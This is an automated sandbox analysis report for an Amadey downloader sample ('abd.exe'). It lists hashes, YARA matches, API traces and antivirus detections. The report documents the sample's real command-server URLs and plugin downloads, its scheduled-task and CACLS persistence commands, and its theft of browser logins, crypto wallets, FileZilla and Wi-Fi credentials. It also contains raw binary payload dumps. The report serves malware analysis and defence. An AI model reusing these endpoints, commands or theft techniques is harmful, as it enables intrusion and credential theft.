Summary | ZeroBOX

abd.exe

Browser Login Data Stealer Amadey UPX Malicious Library Malicious Packer PE64 PE File DLL OS Processor Check JPEG Format PE32
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 31, 2023, 5:42 p.m. Oct. 31, 2023, 5:44 p.m.
Size 307.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 b6d627dcf04d04889b1f01a14ec12405
SHA256 9da10d7b75c589f06f1758ed8e3c0335b9a738d0ad1317c48e380bca768bdddf
CRC32 20C054AF
ssdeep 6144:G77rhGafhHSBwHRqGJbdbZI44SGe4s8Lu67rvAOveiZavLb:G7rRSSHRnJfIrscu67TZhavL
PDB Path D:\Mktmp\Amadey\Release\Amadey.pdb
Yara
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
  • Malicious_Packer_Zero - Malicious Packer
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • OS_Processor_Check_Zero - OS Processor Check

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
185.196.8.176 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "Utsysc.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path D:\Mktmp\Amadey\Release\Amadey.pdb
file C:\Program Files (x86)\Google\Chrome\Application\.purple\accounts.xml
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\Path
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.196.8.176/7jshasdS/index.php
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.196.8.176/7jshasdS/index.php?scr=1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.196.8.176/7jshasdS/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.196.8.176/7jshasdS/Plugins/clip64.dll
request POST http://185.196.8.176/7jshasdS/index.php
request POST http://185.196.8.176/7jshasdS/index.php?scr=1
request GET http://185.196.8.176/7jshasdS/Plugins/cred64.dll
request GET http://185.196.8.176/7jshasdS/Plugins/clip64.dll
request POST http://185.196.8.176/7jshasdS/index.php
request POST http://185.196.8.176/7jshasdS/index.php?scr=1
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02010000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1452
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003ef0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72a02000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75d41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75e61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76161000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fb0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72cb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72c74000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72a11000
process_handle: 0xffffffff
1 0 0
description Utsysc.exe tried to sleep 216 seconds, actually delayed analysis time by 216 seconds
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal
file C:\Users\test22\AppData\Local\Chromium\User Data\Default\Login Data
file C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll
file C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
file C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
file C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
file C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $‘¶Õ×tOÕ×tOÕ×tOŽ¿pNÇ×tOŽ¿wNÞ×tOŽ¿qNe×tOºqN×tOºpNÚ×tOºwNÜ×tOŽ¿uNØ×tOÕ×uO×tON¹}NÑ×tON¹tNÔ×tON¹‹OÔ×tON¹vNÔ×tORichÕ×tOPEd†’ /eð" rê˜ €À`%Xh%ŒøÐØ¢ MpNà.textÈpr `.rdataº©ªv@@.data €@> @À.pdataآФ^@@_RDATA”€@@.rsrcø@@.reloc @BHƒì(A¸ H''H [è“ H JHƒÄ(éÿ ÌÌÌHƒì(A¸ H'H °_èc H LJHƒÄ(éÏ ÌÌÌHƒì(A¸H'H ``è3 H ŒJHƒÄ(éŸ ÌÌÌHƒì(A¸ Hï&H p[è H ÌJHƒÄ(éo ÌÌÌHƒì(A¸Hç&H à^èÓ~ H KHƒÄ(é? ÌÌÌHƒì(A¸HÏ&H Yè£~ H LKHƒÄ(é ÌÌÌHƒì(E3ÀH¢ˆH c_èv~ H KHƒÄ(éâ ÌÌÌÌÌÌHƒì(E3ÀHrˆH “_èF~ H ÏKHƒÄ(é² ÌÌÌÌÌÌHƒì(E3ÀHBˆH £Zè~ H LHƒÄ(é‚ ÌÌÌÌÌÌHƒì(E3ÀHˆH “Xèæ} H OLHƒÄ(éR ÌÌÌÌÌÌHƒì(A¸Hÿ%H àXè³} H ŒLHƒÄ(é ÌÌÌHƒì(A¸Hß%H °`èƒ} H ÌLHƒÄ(éï ÌÌÌHƒì(A¸H¿%H ^èS} H MHƒÄ(é¿ ÌÌÌHƒì(A¸HŸ%H pWè#} H LMHƒÄ(é ÌÌÌHƒì(A¸H%H Yèó| H ŒMHƒÄ(é_ ÌÌÌHƒì(A¸ Ho%H [èÃ| H ÌMHƒÄ(é/ ÌÌÌHƒì(A¸HO%H [è“| H NHƒÄ(éÿ ÌÌÌHƒì(A¸H+%H pYèc| H LNHƒÄ(éÏ ÌÌÌHƒì(A¸H%H @Zè3| H ŒNHƒÄ(éŸ ÌÌÌHƒì(A¸Hï$H ð[è| H ÌNHƒÄ(éo ÌÌÌHƒì(A¸ HÏ$H  \èÓ{ H OHƒÄ(é? ÌÌÌHƒì(A¸LH¯$H ÐXè£{ H LOHƒÄ(é ÌÌÌHƒì(A¸HÏ$H Vès{ H ŒOHƒÄ(éß ÌÌÌHƒì(A¸dH¿$H 0^èC{ H ÌOHƒÄ(é¯ ÌÌÌHƒì(A¸H÷$H €\è{ H PHƒÄ(é ÌÌÌHƒì(A¸Hß$H PZèãz H LPHƒÄ(éO ÌÌÌHƒì(A¸ HÏ$H €Uè³z H ŒPHƒÄ(é ÌÌÌHƒì(A¸ H¯$H ðZèƒz H ÌPHƒÄ(éïÿ ÌÌÌHƒì(A¸(H$H `YèSz H QHƒÄ(é¿ÿ ÌÌÌHƒì(A¸ H$H \è#z H LQHƒÄ(éÿ ÌÌÌHƒì(A¸ Ho$H ^èóy H ŒQHƒÄ(é_ÿ ÌÌÌHƒì(A¸HO$H PZèÃy H ÌQHƒÄ(é/ÿ ÌÌÌHƒì(A¸H/$H À[è“y H RHƒÄ(éÿþ ÌÌÌHƒì(A¸ H$H Wècy H LRHƒÄ(éÏþ ÌÌÌHƒì(A¸,Hÿ#H ÀWè3y H ŒRHƒÄ(éŸþ ÌÌÌHƒì(A¸Hÿ#H ÐVèy H ÌRHƒÄ(éoþ ÌÌÌHƒì(A¸ Hï#H €ZèÓx H SHƒÄ(é?þ ÌÌÌHƒì(A¸$HÏ#H ðZè£x H LSHƒÄ(éþ ÌÌÌHƒì(A¸HÇ#H  Wèsx H ŒSHƒÄ(éßý ÌÌÌHƒì(A¸H¯#H pRèCx H ÌSHƒÄ(é¯ý ÌÌÌHƒì(A¸HŸ#H àWèx H THƒÄ(éý ÌÌÌHƒì(A¸ H#H ÐTèãw H LTHƒÄ(éOý ÌÌÌHƒì(A¸ Ho#H ÀXè³w H ŒTHƒÄ(éý ÌÌÌHƒì(A¸ Hg#H °Uèƒw H ÌTHƒÄ(éïü ÌÌÌHƒì(A¸ Hÿ"H àRèSw H UHƒÄ(é¿ü ÌÌÌHƒì(A¸H/#H Uè#w H LUHƒÄ(éü ÌÌÌHƒì(A¸H#H @Rèóv H ŒUHƒÄ(é_ü ÌÌÌHƒì(A¸ H÷"H PYèÃv H ÌUHƒÄ(é/ü ÌÌÌHƒì(A¸LHŸH @Uè“v H VHƒÄ(éÿû ÌÌÌHƒì(A¸H§"H 0Uècv H LVHƒÄ(éÏû ÌÌÌHƒì(A¸dH¯H àUè3v H ŒVHƒÄ(éŸû ÌÌÌHƒì(A¸HW"H Yèv H ÌVHƒÄ(éoû ÌÌÌHƒì(A¸H?"H àWèÓu H WHƒÄ(é?û ÌÌÌHƒì(A¸ H'"H ðTè£u H LWHƒÄ(éû ÌÌÌHƒì(A¸H"H Rèsu H ŒWHƒÄ(éßú ÌÌÌHƒì(A¸Hß!H ðXèCu H ÌWHƒÄ(é¯ú ÌÌÌHƒì(A¸H·!H Tèu H XHƒÄ(éú ÌÌÌHƒì(A¸H!H pRèãt H LXHƒÄ(éOú ÌÌÌHƒì(A¸Ho!H  Pè³t H ŒXHƒÄ(éú ÌÌÌHƒì(A¸HO!H Nèƒt H ÌXHƒÄ(éïù ÌÌÌHƒì(A¸ H?!H €TèSt H YHƒÄ(é¿ù ÌÌÌHƒì(A¸0H!H pWè#t H LYHƒÄ(éù ÌÌÌHƒì(A¸ H'!H `Wèós H ŒYHƒÄ(é_ù ÌÌÌHƒì(A¸H!H ðWèÃs H ÌYHƒÄ(é/ù ÌÌÌ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $'ö³c—jàc—jàc—jà8ÿiái—jà8ÿoáë—jà8ÿnáq—jà¶únál—jà¶úiár—jà¶úoáB—jà8ÿkád—jàc—kà—jàøùcá`—jàøùjáb—jàøù•àb—jàøùháb—jàRichc—jàPEL” /eà! ’Ðf à@@zœÜzP°øÀÜÀnp0o@ H.text  `.rdata@b d@@.data v@À.rsrcø°‚@@.relocÜÀ„@Bj hèl¹p˜èOHh°è\SYÃÌÌÌj h m¹ˆ˜è/Hhè<SYÃÌÌÌjh0m¹ ˜èHhpèSYÃÌÌÌjhHm¹¸˜èïGhÐèüRYÃÌÌÌjhem¹Ð˜èÏGh0èÜRYÃÌÌÌjhem¹è˜è¯Ghè¼RYÃÌÌÌjhem¹™èGhðèœRYÃÌÌÌjhem¹™èoGhPè|RYÃÌÌÌh°èmRYÃÌÌÌÌhè]RYÃÌÌÌÌhpèMRYÃÌÌÌÌj?hðm¹x™èGhÐè,RYÃÌÌÌh°èRYÃÌÌÌÌhPè RYÃÌÌÌÌhðèýQYÃÌÌÌÌhèíQYÃÌÌÌÌh0èÝQYÃÌÌÌ̋ÁÂÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇÔ!f֋EƒÀPè[ƒÄ‹Æ^]ÂÌÌ̋I¸¼l…ÉEÁÃÌÌU‹ìV‹ñFÇÔ!PèC[ƒÄöEt j VèûMƒÄ‹Æ^]AÇÔ!Pè[YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇAÐlÇ,"ÃÌÌÌÌÌÌÌÌU‹ìƒì MôèÒÿÿÿh(zEôPèëZÌÌÌÌU‹ìV‹ñWÀFPÇÔ!f֋EƒÀPèBZƒÄÇ,"‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇÔ!f֋EƒÀPèZƒÄÇà!‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìì„ƒ}SV‹ÙW‰]à„Ûƒ}0„у}H„Çj/hhmMÈÇEôÇEøÆEäÇEØÇEÜÆEÈèþDjjjjh˜mÿ,!ƒ}MjCMjjjjjPQP‰E´ÿ0!ƒ}4M jCM jjjjQhœmP‰E¸ÿ4!ƒ}LU8ÿuHCU8Mȃ}Ü‹ðRÿuØCMÈQV‰uÀÿ8!EüPhÿ…€ûÿÿPVÿ<!…À„iƒ}ü„\…€ûÿÿÇE”ÇE˜PÆE„fDŠ@„Éuù+M„P…€ûÿÿPèD‹MüE„9M”ÇE¬BM”ƒ}˜QCE„MœPÇE°ÆEœèæCƒ}°Uœ‹}œ‹MôC׋Eø‹]¬+Á‰MÄSR;Øw,ƒ}øuä Cuä‰EôPè[j‹Mč3‹uÀƒÄ ÆëÆE¼Mäÿu¼SèIG‹}œ‹E°ƒør+H‹Çùr‹üƒÁ#+ǃÀüƒø‡˜QWèKƒÄ‹U˜ƒúr,‹M„B‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡dRQèÓJƒÄ‹EüƄ€ûÿÿEüPhÿ…€ûÿÿPVÿ<!…À…šþÿÿ‹]àV‹5@!ÿÖÿu¸ÿÖÿu´ÿÖEä‹UܸÆEäó~EôfÖCÇEô‰Eøƒúr/‹MÈB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡ÌRQè;J‹EøƒÄÇEØÇEÜÆEȃør.‹MäP‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡„RQèóIƒÄ‹UÇEôÇEøÆEäƒúr,‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡>RQè­IƒÄ‹U4ÇEÇEÆEƒúr,‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡øRQègIƒÄ‹ULÇE0ÇE4ÆE ƒú‚Ç‹M8B‹Áú‚«‹IüƒÂ#+ÁƒÀüƒø‡ªé’jhemÇCÇCÆèMA‹Uƒúr(‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwbRQèÑHƒÄ‹U4ÇEÇEÆEƒú‚Lÿÿÿ‹M B‹Áú‚0ÿÿÿ‹IüƒÂ#+ÁƒÀüƒøwéÿÿÿRQè‚HƒÄ_^‹Ã[‹å]Ãè nÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì<¹`™SVW‹=@™3öVhem3Ûè@…ÿ„–DCOãÿ€yKËÿÿÿCŠ‹ð¥¶Ñòæÿ€yNÎÿÿÿF¶†ð¥ˆƒð¥ˆŽð¥Mඃð¥‰uø¶ÀjÇEðÇEô¶€ð¥ˆEÿEÿPÆEàè@Eàº`™PMÈèvA‹ðƒÄþ`™t|‹ t™ƒùr.¡`™Aùr‹PüƒÁ#+ƒÀüƒø‡Ô‹ÂQPèdGƒÄÇp™Çt™Æ`™`™ó~FfÖp™ÇFÇFÆ‹U܃úr(‹MÈB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw_RQèñFƒÄ‹UôÇEØÇEÜÆEȃúr(‹MàB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQè¯FƒÄ…ÿt‹uøéoþÿÿ_^[‹å]ÃèÃlÌÌÌU‹ìƒì<SVW‹ùÇGÇGÆèþÿÿ¡t™¾`™‹`™ƒø»0™Còƒ=D™C0™+މ]øƒø¹`™¡p™CÊÁ;ð„*Š3Mà2ˆEÿEÿjPÇEðÇEôÆEàèN>Eà‹×PMÈèÀ?‹ØƒÄ;ûte‹Oƒùr+‹Aùr‹PüƒÁ#+ƒÀüƒø‡Í‹ÂQPè¸EƒÄÇGÇGÆó~CfÖGÇCÇCÆ‹U܃úr(‹MÈB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwiRQèVEƒÄ‹UôÇEØÇEÜÆEȃúr(‹MàB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw'RQèEƒÄ¡t™F‹`™‹]øé¼þÿÿ‹Ç_^[‹å]ÃèkÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQƒ}4E SCE VWÿu0‰Mü¹H™Pè =ƒ}EÿuCE¹0™Pèô<‹5X™3ۋ=\™fDƒÿˆ›ð¥‹Ã¹H™C H™™÷þŠ ˆƒð¤Cû|Ô3ÿ3öŠ–𥶆ð¤ø¶Êùçÿ€yOÏÿÿÿGŠ‡ð¥ˆ†ð¥Fˆ—ð¥þ|Á‹uü‹Îè‡ýÿÿ‹Uƒúr
request_handle: 0x00cc000c
1 1 0
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline CACLS "Utsysc.exe" /P "test22:R" /E
cmdline netsh wlan show profiles
cmdline "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"
cmdline cmd /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline CACLS "Utsysc.exe" /P "test22:N"
host 185.196.8.176
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
file C:\Users\test22\AppData\Roaming\Electrum\wallets
file C:\Users\test22\AppData\Roaming\Litecoin\wallets
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Windows\.purple\accounts.xml
file C:\util\Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final\.purple\accounts.xml
file C:\Windows\System32\.purple\accounts.xml
file C:\Users\test22\AppData\Local\Temp\ea7c8244c8\.purple\accounts.xml
file C:\Program Files\Windows Photo Viewer\.purple\accounts.xml
file C:\.purple\accounts.xml
file C:\SystemRoot\System32\.purple\accounts.xml
file C:\Program Files\_Sandboxie\.purple\accounts.xml
file C:\Program Files (x86)\Internet Explorer\.purple\accounts.xml
file C:\Program Files\Windows NT\Accessories\.purple\accounts.xml
file C:\util\.purple\accounts.xml
file C:\Python27\.purple\accounts.xml
file C:\Program Files (x86)\Microsoft Office\Office12\.purple\accounts.xml
file C:\Users\test22\Downloads\.purple\accounts.xml
file C:\Program Files (x86)\Google\Chrome\Application\.purple\accounts.xml
file C:\Program Files (x86)\Hnc\Hwp80\.purple\accounts.xml
file C:\Program Files\_Wireshark\.purple\accounts.xml
file C:\Windows\SysWOW64\.purple\accounts.xml
file C:\Program Files (x86)\EditPlus\.purple\accounts.xml
cmdline CACLS "..\ea7c8244c8" /P "test22:N"
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline CACLS "..\ea7c8244c8" /P "test22:R" /E
cmdline CACLS "Utsysc.exe" /P "test22:R" /E
cmdline cmd /k echo Y|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline CACLS "Utsysc.exe" /P "test22:N"
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Deyma.4!c
Elastic Windows.Trojan.Amadey
DrWeb Trojan.Siggen21.44100
MicroWorld-eScan Gen:Variant.Zusy.446510
FireEye Generic.mg.b6d627dcf04d0488
Skyhigh BehavesLike.Win32.Downloader.fh
ALYac Gen:Variant.Zusy.446510
Malwarebytes Spyware.Amadey
Zillya Downloader.Amadey.Win32.286
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan-Downloader ( 005790d31 )
BitDefender Gen:Variant.Zusy.446510
K7GW Trojan-Downloader ( 005790d31 )
Cybereason malicious.d6f200
BitDefenderTheta Gen:NN.ZexaF.36792.tuW@a0HJc@fi
VirIT Trojan.Win32.Genus.TTW
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/TrojanDownloader.Amadey.A
APEX Malicious
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-Downloader.Win32.Deyma.gen
Alibaba TrojanDownloader:Win32/Amadey.29bf597d
ViRobot Trojan.Win.Z.Amadey.314368.B
